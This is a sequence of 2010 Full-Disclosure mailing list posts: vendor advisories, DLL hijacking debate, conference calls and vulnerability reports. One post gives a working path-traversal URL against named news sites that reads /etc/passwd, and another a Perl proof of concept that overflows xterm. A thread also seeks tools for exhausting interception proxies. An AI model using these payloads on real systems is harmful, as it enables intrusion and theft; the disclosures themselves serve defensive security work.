[Full-disclosure] Unusable Security [was: Re: DLL hijacking with Autorun on a USB drive], also proxy in the middle detection / destruction
On Tue, Aug 31, 2010 at 4:26 PM, coderman coder...@gmail.com wrote: ... it would have been nice to collect stats from the get go. then he might have shown only a 99.72% success rate. on this subject, transparent MITM tools like MAORYYY!!* and friends often succumb to resource exhaustion attacks. i've been looking for something to accomplish the following while requiring the least amount of resources on the host. (the point is to leverage as little of your resources to exhaust the resources of the transparent monkey in the middle.) unfortunately this kills any NAT router in your egress path but who needs those anyway? ideally these packet generators would be layers on top of scapy, another indispensable utility: attached to a raw ethernet / datagram device i need: a. lightweight TCP state machine for connection tracking / file descriptor exhaustion b. lightweight SSL/TLS state machine and weak key generation for SSL session exhaustion how small can you get per TCP connection overhead sufficient to maintain state assuming fixed pool of client IPs to random destinations? 64bytes / conn? 16bytes? less? how small can you get per TCP+SSL connection overhead sufficient to maintain state assuming fixed pool of client IPs to random destinations and server side certificates? (weak keys, key derivation functions, other memory conserving implementation tricks encouraged :) 0.25kB/sess.? 48B/sess? * kudos guys; i like this tool. a little tweaking to protocol/base.py for full s2c response buffering, de-chunking, mangling and it works nicely for a wide range of needs. ++ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] VMSA-2010-0013
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - VMware Security Advisory Advisory ID: VMSA-2010-0013 Synopsis: VMware ESX third party updates for Service Console Issue date:2010-08-31 Updated on:2010-08-31 (initial release of advisory) CVE numbers: CVE-2005-4268 CVE-2010-0624 CVE-2010-2063 CVE-2010-1321 CVE-2010-1168 CVE-2010-1447 - 1. Summary ESX 3.5 Console OS (COS) updates for COS packages perl, krb5, samba, tar, and cpio. 2. Relevant releases VMware ESX 3.5 without patches ESX350-201008405-SG, ESX350-201008407-SG, ESX350-201008410-SG, ESX350-201008411-SG, ESX350-201008412-SG. Notes: Effective May 2010, VMware's patch and update release program during Extended Support will be continued with the condition that all subsequent patch and update releases will be based on the latest baseline release version as of May 2010 (i.e. ESX 3.0.3 Update 1, ESX 3.5 Update 5, and VirtualCenter 2.5 Update 6). Refer to section End of Product Availability FAQs at http://www.vmware.com/support/policies/lifecycle/vi/faq.html for details. Extended support for ESX 3.0.3 ends on 2011-12-10. Users should plan to upgrade to at least ESX 3.5 and preferably to the newest release available. 3. Problem Description a. Service Console update for cpio The service console package cpio is updated to version 2.5-6.RHEL3. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2005-4268 and CVE-2010-0624 to the issues addressed in this update. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ ProductVersion on Apply Patch = === = VirtualCenter any Windows not affected hosted * any any not affected ESXi any ESXi not affected ESX4.1 ESX affected, patch pending ESX4.0 ESX affected, patch pending ESX3.5 ESX ESX350-201008405-SG ESX3.0.3 ESX affected, patch pending * hosted products are VMware Workstation, Player, ACE, Server, Fusion. b. Service Console update for tar The service console package tar is updated to version 1.13.25-16.RHEL3 The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2010-0624 to the issue addressed in this update. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ ProductVersion on Apply Patch = === = VirtualCenter any Windows not affected hosted * any any not affected ESXi any ESXi not affected ESX4.1 ESX affected, patch pending ESX4.0 ESX affected, patch pending ESX3.5 ESX ESX350-201008407-SG ESX3.0.3 ESX affected, patch pending * hosted products are VMware Workstation, Player, ACE, Server, Fusion. c. Service Console update for samba The service console packages for samba are updated to version samba-3.0.9-1.3E.17vmw, samba-client-3.0.9-1.3E.17vmw and samba-common-3.0.9-1.3E.17vmw. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2010-2063 to the issue addressed in this update. Note: The issue mentioned above is present in the Samba server (smbd) and is not present in the Samba client or Samba common packages. To determine if your system has Samba server installed do a 'rpm -q samba`. The following lists when the Samba server is installed on the ESX service console: - ESX 4.0, ESX 4.1 The Samba server is not present on ESX 4.0 and ESX 4.1. - ESX 3.5 The Samba server is present if an earlier patch for Samba has been installed. - ESX 3.0.3 The Samba server is present if ESX 3.0.3 was upgraded from an earlier version of ESX 3 and a Samba patch was installed on that version. The Samba server is not needed to operate the service console and can be be disabled without loss of functionality to the service console. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace
[Full-disclosure] VMSA-2010-0013 VMware ESX third party updates for Service Console
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - VMware Security Advisory Advisory ID: VMSA-2010-0013 Synopsis: VMware ESX third party updates for Service Console Issue date:2010-08-31 Updated on:2010-08-31 (initial release of advisory) CVE numbers: CVE-2005-4268 CVE-2010-0624 CVE-2010-2063 CVE-2010-1321 CVE-2010-1168 CVE-2010-1447 - 1. Summary ESX 3.5 Console OS (COS) updates for COS packages perl, krb5, samba, tar, and cpio. 2. Relevant releases VMware ESX 3.5 without patches ESX350-201008405-SG, ESX350-201008407-SG, ESX350-201008410-SG, ESX350-201008411-SG, ESX350-201008412-SG. Notes: Effective May 2010, VMware's patch and update release program during Extended Support will be continued with the condition that all subsequent patch and update releases will be based on the latest baseline release version as of May 2010 (i.e. ESX 3.0.3 Update 1, ESX 3.5 Update 5, and VirtualCenter 2.5 Update 6). Refer to section End of Product Availability FAQs at http://www.vmware.com/support/policies/lifecycle/vi/faq.html for details. Extended support for ESX 3.0.3 ends on 2011-12-10. Users should plan to upgrade to at least ESX 3.5 and preferably to the newest release available. 3. Problem Description a. Service Console update for cpio The service console package cpio is updated to version 2.5-6.RHEL3. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2005-4268 and CVE-2010-0624 to the issues addressed in this update. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ ProductVersion on Apply Patch = === = VirtualCenter any Windows not affected hosted * any any not affected ESXi any ESXi not affected ESX4.1 ESX affected, patch pending ESX4.0 ESX affected, patch pending ESX3.5 ESX ESX350-201008405-SG ESX3.0.3 ESX affected, patch pending * hosted products are VMware Workstation, Player, ACE, Server, Fusion. b. Service Console update for tar The service console package tar is updated to version 1.13.25-16.RHEL3 The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2010-0624 to the issue addressed in this update. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ ProductVersion on Apply Patch = === = VirtualCenter any Windows not affected hosted * any any not affected ESXi any ESXi not affected ESX4.1 ESX affected, patch pending ESX4.0 ESX affected, patch pending ESX3.5 ESX ESX350-201008407-SG ESX3.0.3 ESX affected, patch pending * hosted products are VMware Workstation, Player, ACE, Server, Fusion. c. Service Console update for samba The service console packages for samba are updated to version samba-3.0.9-1.3E.17vmw, samba-client-3.0.9-1.3E.17vmw and samba-common-3.0.9-1.3E.17vmw. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2010-2063 to the issue addressed in this update. Note: The issue mentioned above is present in the Samba server (smbd) and is not present in the Samba client or Samba common packages. To determine if your system has Samba server installed do a 'rpm -q samba`. The following lists when the Samba server is installed on the ESX service console: - ESX 4.0, ESX 4.1 The Samba server is not present on ESX 4.0 and ESX 4.1. - ESX 3.5 The Samba server is present if an earlier patch for Samba has been installed. - ESX 3.0.3 The Samba server is present if ESX 3.0.3 was upgraded from an earlier version of ESX 3 and a Samba patch was installed on that version. The Samba server is not needed to operate the service console and can be be disabled without loss of functionality to the service console. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace
Re: [Full-disclosure] Orange Spain disclosing user phone number
Orange Spain has updated it´s GW configuration and it´s not adding the user MSISDN by default anymore. Another example that responsible disclosure is not always enough. Thanks for helping fixing this @xuf_ On Mon, Aug 30, 2010 at 4:48 PM, B1towel b...@b1towel.com wrote: It would be funny to see advertisers send targeted SMS ads using this. I bet that the advertisers of web sites that participate in iframe ads would also get this information, assuming the Phone would load up iframe ads. I think the provider should fix this, because if someone developed an exploit similar to the one that was able to compromise the iPhone a while back just by sending a maliciously formed SMS message, your phone could be compromised just by going to a website where this information is sent to the web server. I know this is pretty obvious, just my 2 cents. On Aug 30, 2010, at 7:00 AM, full-disclosure-requ...@lists.grok.org.uk wrote: Message: 2 Date: Sun, 29 Aug 2010 21:09:50 +0200 From: xufi . xuf...@gmail.com Subject: [Full-disclosure] Orange Spain disclosing user phone number To: full-disclosure@lists.grok.org.uk Message-ID: aanlktinky8usakpd0gg5uosesdfene8bhjaa-oepk...@mail.gmail.com Content-Type: text/plain; charset=ISO-8859-1 Hi, Doing an assessment on mobile GWs I found that Orange Spain is adding the user MSISDN in any HTTP request sent in it?s network. That means that is really simple to get the user phone number from a Orange Spain user. On one hand, I saw that Orange Spain uses the header x-up-calling-line-id to add a user temporary ID that changes every 24h but I also found that in any HTTP request they will add the user phone number in the header X-Network-info. In particular the HTTP header looks like as follow: X-Network-info: CSD,34x,unsecured where x is the user MSISDN ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Mac OS X Mail parental controls vulnerability
The parental controls built into the Mac OS X Mail client can be easily bypassed by anyone who knows the email address of the child and his/her parent. The Mail client can be fooled into adding any address to the child's whitelist (i.e., the list of addresses with whom the child is allowed to correspond), as if the parent had approved the address, without his/her knowledge or consent. This vulnerability can be taken advantage of by the child or by any third party anywhere on the Internet. I have reported this vulnerability to Apple, and they have declined to assign a CVE ID for it, disclose it to the public, or indicate a time-line for when it will be disclosed or fixed. For more information: http://blog.kamens.us/2010/08/03/mac-os-x-mail-parental-controls-vulnerabili ty/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Gawker/Kotaku Local File Inclusion
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Thought I'd share this...found an LFI on gawker which is on the same server as Kotaku and other sites part of their 'network' http://kotaku.com/assets/minify.php?fsid=dfdsftype=sadssb=../../.. /../../../../../../../etc/passwd%00 ^ works for gawker as well, just replace the name Full source code of the offending page http://pastebin.com/eWuExuke newline characters are stripped out however... This was the original 'LFI' I used to get the source code http://gawker.com/assets/minify.php?base=/assets/base.v9/css/../../l ib/jsmin.php%00files=asfdf.css It seems to be fixed today though. But the other LFI above still works :D AFAIK it's not exploitable beyond the obvious information disclosures, as they don't allow read access to logfiles, and /proc/self/environ is unreadable. Still amusing to find this on there. -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkx9aS4ACgkQ3nE+T38NspftqgP+N5mPHgA/n5JzGtekqQv6HpbcFS/W iL4xh7OpfZISj7GXQJZjv40muLEkQFEgEZmNnX+Mw5y8ByLNqkDjbEULdLPe3XjB4TEy TrkzY2jRbvyO+KWzBs1jFFrAAbdK+UhYt94ELX/optiusAUWI3ZoWsh1umateF67sLJ0 RlpDn5Y= =ryBU -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Tortoise SVN DLL Hijacking Vulnerability
1. Overview Tortoise SVN is vulnerable to Windows DLL Hijacking Vulnerability. Version 1.6.10, Build 19898 (latest available on 30th August 2010 was tested) is vulnerable. 2. Vulnerability Description Tortoise SVN passes insufficiently qualified path for the dll dwmapi.dll while opening a file using TortoiseProc Timeline 30-08-2010 - Discovered Vulnerability 30-08-2010 - Informed the developers 30-08-2010 - Response from developers (in 25 minutes) 31-08-2010 - Disclosure The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2010-3199 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. 3. Exploitability A file extension needs to be registered with TortoiseProc to exploit the vulnerability and a crafted file needs to be opened from a network share. 4. Versions Affected TortoiseSVN 1.6.10, Build 19898 and lower. 5. POC/Exploit Done with Webdav hijack module of Metasploit 6. Impact Remote Code Execution in context of TortoiseProc 7. References http://tortoisesvn.tigris.org/ds/viewMessage.do?dsForumId=4061dsMessageId=2653163 8. Solution Fix awaited from Microsoft. Meanwhile workarounds can be found here http://www.microsoft.com/technet/security/advisory/2269637.mspx --- Nikhil Mittal ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Rooted CON 2011 - Call for Papers
Rooted CON 2011 - Call for Papers -=] About Rooted CON Rooted CON is a security congress which will be held in Madrid (Spain) from 3 to 5 March 2011, whose spectrum of participants ranging from students to state forces and secret services, through professionals of the security market, lawyers, or even technology enthusiasts (and others). -=] Type of Presentations The congress accepts two kinds of presentations: - Fast talks: 20 minutes. - Normal talks: 50 minutes. Depending of the received proposals, the talks will determine the quantities of each type to confirm,there is not a stablished schedule format for the congress but the agenda is structured according to demand and supply that is received. -=] Topics Topics and lectures considered interesting, but not exclusively limited to: - Hacking, cracking, phreaking, virii, WiFi, VoIP, GSM... - Reverse engineering, debugging, hooking, fuzzing, exploiting,... - Innovative defensive and offensive techniques and tools. - Security in the cloud, security and hacking inside virtual environments, products and services in the cloud, ... - Técnicas de criptografía, esteganografía, canales subliminales, ... - Forensics, researching and anti-forensics techniques. - Networking, lawyer 2 and 3 protocols and hacking, encapsulation, ... We will especially appreciate issues and proposals which were not submitted in the previous edition of Rooted CON. -=] Procedure for submitting proposals Only proposals received through the registration form will be accepted, which can be accessed at the URL: - https://www.rootedcon.es/cfp2011-esp/ (spanish) - https://www.rootedcon.es/cfp2011-eng/ (english) Any other form, media or communication other than through the above-mentioned form is not considered for the purpose of submitted presentations and, of course, not been valued. -=] Schedule - 01 Sept 2010 - CFP opens - 31 Dec 2010 - CFP closes. - Jan 2011 - Speakers selection. - Feb 2011 - Final paper and presentations material submitted - 3-5 March 2011 - Rooted CON 2011 -=] Speaker privileges Every speaker will be given the following benefits: - Free dinner with the other speakers night before the congress. - Free accommodation - Travel expenses - Free access to the congress - Free party tickets/drinks -=] Sponsors and partners Rooted CON is always looking for quality sponsors for the organization of the congress, so if you or your company is interested, please contact us: sponsors-AT-rootedcon.es Any help, ideas, proposals or collaborations you send us will be considered and valued by the organization: we depend on you to make this congress one of the most original. -=] Contact us Any ideas, suggestions or questions: info-AT-rootedcon.es -=] Our links - Web: http:/ /www.rootedcon.es/eng/ - Twitter: @rootedcon - Facebook: http://bit.ly/fbookrooted - LinkedIn: http://bit.ly/linkedinrooted - Rooted mailing-list (spanish): rooted...@listas.rooted.es ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Month of Abysssec Undisclosed Bugs - Day 1
Hi Lists, The Abysssec Security Team has started its Month of Abysssec undisclosed bugs (MOAUB). During this month, Abysssec will release a collection of 0days, web application vulnerabilities, and detailed binary analysis (and pocs) for recently released advisories by vendors such as Microsoft, Mozilla, Sun, Apple, Adobe, HP, Novel, etc. The exploits, papers and PoCs will be featured on the Exploit-Database (http://www.exploit-db.com), averaging one 0day and one binary analysis a day. Get your hard-hats on, your VM¹s and debugging tools organized it¹s going to be a an intensive ride. Posted today - MOAUB Day 1: http://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerabili ty/ http://www.exploit-db.com/moaub-1-cpanel-php-restriction-bypass-vulnerabilit y/ Enjoy, Abysssec and the Exploit Database Team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DLL hijacking with Autorun on a USB drive
On Tue, Aug 31, 2010 at 7:03 PM, Dan Kaminsky d...@doxpara.com wrote: On Aug 31, 2010, at 2:20 PM, Charles Morris cmor...@cs.odu.edu wrote: On Tue, Aug 31, 2010 at 5:15 PM, Dan Kaminsky d...@doxpara.com wrote: Again, the clicker can't differentiate word (the document) from word (the executable). The clicker also can't differentiate word (the document) from word (the code equivalent script). The security model people keep presuming exists, doesn't. Even the situation whereby a dll is dropped into a directory of documents -- the closest to a real exploit path there is -- all those docs can be repacked into executables. What? I can differentiate my coolProposal.doc from msword.exe just fine.. Uh huh. Here, let me go ahead and create 2010 Quarterly Numbers.ppt.exe with a changed icon, and see what you notice. Mr. Szabo has already slapped your wrist for such undeserved arrogance. And yeah, I find it a joke that you think that .ppt.exe isn't pretty damn obvious. I might have fell for that when I was 9, but I haven't had a problem with a windows box in years. I will admit, at 3AM when I've been working for 18 hours and awake for 36, it is possible that I may double-click such a malicious file and then immediately think OH shit and rebuild. I know what we can do, we can repackage the Hey watch out for badguys masquerading as innocent files that everybody already knows about, contact CERT and negotiate a fix between major vendors (Hey this isn't just a MS vulnerability right??), then give a talk at blackhat to establish our fame, but now that I think about it.. that would be rude to the people who have been complaining about this since 1999. If your statement is that the windows defaults should be changed, including the hide extensions default, then I wholeheartedly agree as I detailed in my first post. It's the first thing I turn off. Many people who think the same way have considered that a vulnerability in windows for years, I wouldn't consider it part of the DLL Hijacking fiasco. Imagine if the browser lock meant arbitrary code could run. I find your faith in small collections of pixels hilarious. Imagine if the keyboard LED meant arbitrary code could run!! What? I don't even understand what you are getting at. This has nothing to do with faith in icons. My statement was that windows defaults arguably represent a vulnerability in the GUI by making proposal.doc indistinguishable from proposal.doc.exe with a crafted icon, when you are encouraged to double-click the icons through the GUI, and when doc files are supposed to be innocent to open. I was also stating the fact that this vulnerability should be addressed outside of the scope of the DLL Hijacking mess. Cheers, Charles ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] nullcon Goa dwitiya (2.0) Call For Papers
nullcon Dwitiya (2.0) The Jugaad(hacking) Conference nullcon is an initiative by null - The open security community. Website: http://nullcon.net Calling all Jugaadus(hackers) It's the time of the year when we welcome research done by the community as paper submissions for nullcon. So, sip your coffee, dust your debuggers, fire your tools, challenge your grey cells and shoot us an email. Tracks: --- - Bakkar: 1 Hr Talks - Tez: 5-30 min Talks - Karyashala: 2-4 Hrs Workshop - Desi Jugaad (Local Hack): 1 Hr Submition Topics: -- 1. One of the topics of interest to us is Desi Jugaad(Local Hack) and has a separate track of it's own. Submissions can be any kind of local hacks that you have worked on (hints: electronic/mechanical meters, automobile hacking, Hardware, mobile phones, lock-picking, bypassing procedures and processes, etc, Be creative :-D) 2. The topics pertaining to security and Hacking in the following domains(but not limited to) - Hardware (ex: RFID, Magnetic Strips, Card Readers, Mobile Devices, Electronic Devices) - Tools (open source) - Programming/Software Development - Networks - Information Warfare - Botnets, Malware - Web - New attack vectors - Mobile, VOIP and Telecom - VM - Cloud - Critical Infrastructure - Satellite - Wireless - Forensics - Cyber Laws Submission Format: -- Email the cfp to: cfp(_at_)nullcon.net Subject should be: CFP Dwitiya Paper Title Email Body: - Name - Handle - Track Time required - Paper Title - Country of residence - Organization - Contact no. - Have you presented/submitted this talk at any other conference(s)? - Why do you think your paper is different/innovative? - Brief Profile ( = 500 Words) - Paper Abstract ( = 3000 Words) NOTE: The Abstract should clearly mention the techniques and hacks in detail and merely mentioning that it works will not help in understanding the research to it's full extent. Important Dates: -- CFP End Date: 30th November 2010 Speakers List Online: 10th December 2010 Conference Dates: 25th - 26th February 2011 Venue: Goa, India (Exact Venue TBD) Speaker Benifits: For Tracks Bakkar, Desi Jugaad and Karyashala 1. Free Accommodation for 3 nights 2. Travel (One way or Return depending on the Sponsorships :-) ) 3. Free access to the conference. 4. Invitation to Mehfil-E-Mausiqi (null party) For Track Tez 1. Free access to the conference. 2. Invitation to Mehfil-E-Mausiqi (null party) * Only one speaker will be eligible for the benfits in case there are two or more speakers for a talk. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Online Binary Planting Exposure Test
ACROS Security has made the Online Binary Planting Exposure Test publicly accessible for the benefit of all Windows users. This test should make it easy for users and administrators to assess their exposure to binary planting attacks originating from the Internet. URL: http://www.binaryplanting.com/test.htm Note that this test is NOT meant to answer whether you're vulnerable (at this point where so many binary planting vulnerabilities exist out there you certainly are vulnerable if you're on a Windows system). Rather, the test is meant to determine whether your computer or network can be attacked from the Internet (using any one of the known or unknown binary planting bugs). You should also know that any network-based countermeasure (such as blocking SMB and WebDAV at the perimeter) will stop protecting you when you connect your computer to another network, such as a hotel-provided or public wireless network. Running the test in various setups you're using might therefore be a good idea. Additional information here: http://blog.acrossecurity.com/2010/08/online-binary-planting-exposure-test.html. Regards, Mitja Mitja Kolsek CEOCTO ACROS, d.o.o. Makedonska ulica 113 SI - 2000 Maribor, Slovenia tel: +386 2 3000 280 fax: +386 2 3000 282 web: http://www.acrossecurity.com ACROS Security: Finding Your Digital Vulnerabilities Before Others Do ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SecurityArchitect-008]: Xterm Local Buffer Overflow Vulnerability
Product: Xterm Vulnerability: Buffer Overflow (heap-based) Credits: Celil Ünüver from SecurityArchitect.Org Tested on: Ubuntu 10.04 and xterm(256) version Details: Xterm's -fw , -fwb , -fb command line options causes an overflow while writing long argument.. PoC: # Contact: www.securityarchitect.org $file = A x 500; $print = xterm -fw $file; system $print; Results: p...@ubuntu:~/Masaüstü$ perl xterm.pl*** glibc detected *** xterm: munmap_chunk(): invalid pointer: 0x09f593a4 ***=== Backtrace: =/lib/tls/i686/cmov/libc.so.6(+0x6b591)[0x2fd591]/lib/tls/i686/cmov/libc.so.6(+0x6c80e)[0x2fe80e] Greets: hellcode ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] LDAP NULL Bind being picked up, making non PCI compliant
We recently ran a scan against our exchange servers and got the error that our server was vulnerable to an LDAP NULL BIND overflow. This vulnerability is now making out network uncomplient to PCI and are having trouble with a way to fix the problem. I know we can't deny or shut up down LDAP as it is needed by RootDSE, but we need to find a fix or way to stop the LDAP from being picked up as vulnerable. The server is runing Windows 2008, and from what I read is that Win 2008 will show the server as vulnerable but, doesn't really pose any kind of threat? Is this true? Any information will help! Thanks! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Online Binary Planting Exposure Test
Very Cool! :) I think/wish there will be more demos. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LDAP NULL Bind being picked up, making non PCI compliant
On Wed, 01 Sep 2010 10:30:55 EDT, Jason Nada said: We recently ran a scan against our exchange servers and got the error that our server was vulnerable to an LDAP NULL BIND overflow. This vulnerability is now making out network uncomplient to PCI and are having trouble with a way to fix the problem. Have you talked to the outside auditors who are doing the PCI compliance test, and see what you can do with compensating controls? Firewall off the servers so LDAP can only get to/from them from your official machines, etc? pgpnMOWEKC4e7.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Online Binary Planting Exposure Test
On Wed, Sep 1, 2010 at 4:20 AM, ACROS Lists li...@acros.si wrote: ... Note that this test is NOT meant to answer whether you're vulnerable (at this point where so many binary planting vulnerabilities exist out there you certainly are vulnerable if you're on a Windows system). Rather, the test is meant to determine whether your computer or network can be attacked from the Internet (using any one of the known or unknown binary planting bugs). You should also know that any network-based countermeasure (such as blocking SMB and WebDAV at the perimeter) will stop protecting you when you connect your computer to another network, such as a hotel-provided or public wireless network. Running the test in various setups you're using might therefore be a good idea. zero configuration networking services on local wireless, wired networks are a great resource among this class; you'll need a local view to probe unless you add an endpoint local java scanner applet to that page. ... /druthers ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2010:168 ] openssl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:168 http://www.mandriva.com/security/ ___ Package : openssl Date: September 1, 2010 Affected: 2010.1 ___ Problem Description: A vulnerability has been found and corrected in openssl: Double free vulnerability in the ssl3_get_key_exchange function in the OpenSSL client (ssl/s3_clnt.c) in OpenSSL 1.0.0a, 0.9.8, 0.9.7, and possibly other versions, when using ECDH, allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted private key with an invalid prime. NOTE: some sources refer to this as a use-after-free issue (CVE-2010-2939). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2939 ___ Updated Packages: Mandriva Linux 2010.1: 36eb6715b26fc1ef1a284bdf90211882 2010.1/i586/libopenssl1.0.0-1.0.0a-1.1mdv2010.1.i586.rpm 4322d958620b87ebbf8f947b3bc749c1 2010.1/i586/libopenssl1.0.0-devel-1.0.0a-1.1mdv2010.1.i586.rpm e5b658592f1f94e03eead2c8534ac3e7 2010.1/i586/libopenssl1.0.0-static-devel-1.0.0a-1.1mdv2010.1.i586.rpm 24286badaaca314447536442afae3d05 2010.1/i586/openssl-1.0.0a-1.1mdv2010.1.i586.rpm 11fc053a02685ab2e19fb8b8489f6e87 2010.1/i586/openssl-engines-1.0.0a-1.1mdv2010.1.i586.rpm 8c0cd1eb876611815d64e706c64a332d 2010.1/SRPMS/openssl-1.0.0a-1.1mdv2010.1.src.rpm Mandriva Linux 2010.1/X86_64: b66215a9d6faeaa2ca60facb5c77b8cc 2010.1/x86_64/lib64openssl1.0.0-1.0.0a-1.1mdv2010.1.x86_64.rpm fc3b2a6160eda7cdb55b28d4262ad82e 2010.1/x86_64/lib64openssl1.0.0-devel-1.0.0a-1.1mdv2010.1.x86_64.rpm c36f145bcf88e39cb4a94cc8deec761e 2010.1/x86_64/lib64openssl1.0.0-static-devel-1.0.0a-1.1mdv2010.1.x86_64.rpm 6fa62d5b023205f4d7d5ae3b8744c346 2010.1/x86_64/openssl-1.0.0a-1.1mdv2010.1.x86_64.rpm 899e2b1cc0b8e8dc5cab2ae96c5f29f2 2010.1/x86_64/openssl-engines-1.0.0a-1.1mdv2010.1.x86_64.rpm 8c0cd1eb876611815d64e706c64a332d 2010.1/SRPMS/openssl-1.0.0a-1.1mdv2010.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFMflSemqjQ0CJFipgRAgGiAKC5wxDgOnCHOZozhJtEKNomOIS9MQCbBP+n 97XVDZwWZmDjms2vzVvaeUI= =69w7 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DLL hijacking with Autorun on a USB drive
And yeah, I find it a joke that you think that .ppt.exe isn't pretty damn obvious. I might have fell for that when I was 9, but I haven't had a problem with a windows box in years. I will admit, at 3AM when I've been working for 18 hours and awake for 36, it is possible that I may double-click such a malicious file and then immediately think OH shit and rebuild. Thats the real threat of this, to be honest. Yes, you, me, and (hopefully) the rest of the people on this list know what to look for before clicking on something. But, do you view a .doc, or .ppt, or .mp3 as malicious and threatening as a .exe, .bat, or .vbs? Probably not. And, you cannot honestly tell me that you've never browsed to a network share and opened a Word document. And, if that Word document opens and there's legitimate data being displayed (ie - it's the document that you were expecting to open), would you ever consider that you just compromised your system? I think that's what a lot of you are missing.. there's no real trickery involved; No changing of icons, no hiding extensions, no fake files.. a DLL could be dropped into any directory containing Office documents and now each one of those Office documents are, essentially, backdoored. And, not only that, but this is affecting file formats which were previously considered benign or harmless (for the most part). - matt www.attackvector.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DLL hijacking with Autorun on a USB drive
Charles Morris cmor...@cs.odu.edu wrote: ... complaining about this since 1999. Since 1998 at least, see: Microsoft warns of DLL vulnerability in applications http://www.h-online.com/security/news/item/Microsoft-warns-of-DLL-vulnerability-in-applications-1064584.html ... the NSA warnedPDF of the problem of DLL spoofing in its Windows NT Security Guidelines 12 years ago. http://packetstormsecurity.org/NT/audit/NSAGuidePlus.PDF (Does anyone have older references?) Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DLL hijacking with ZIP files in email?
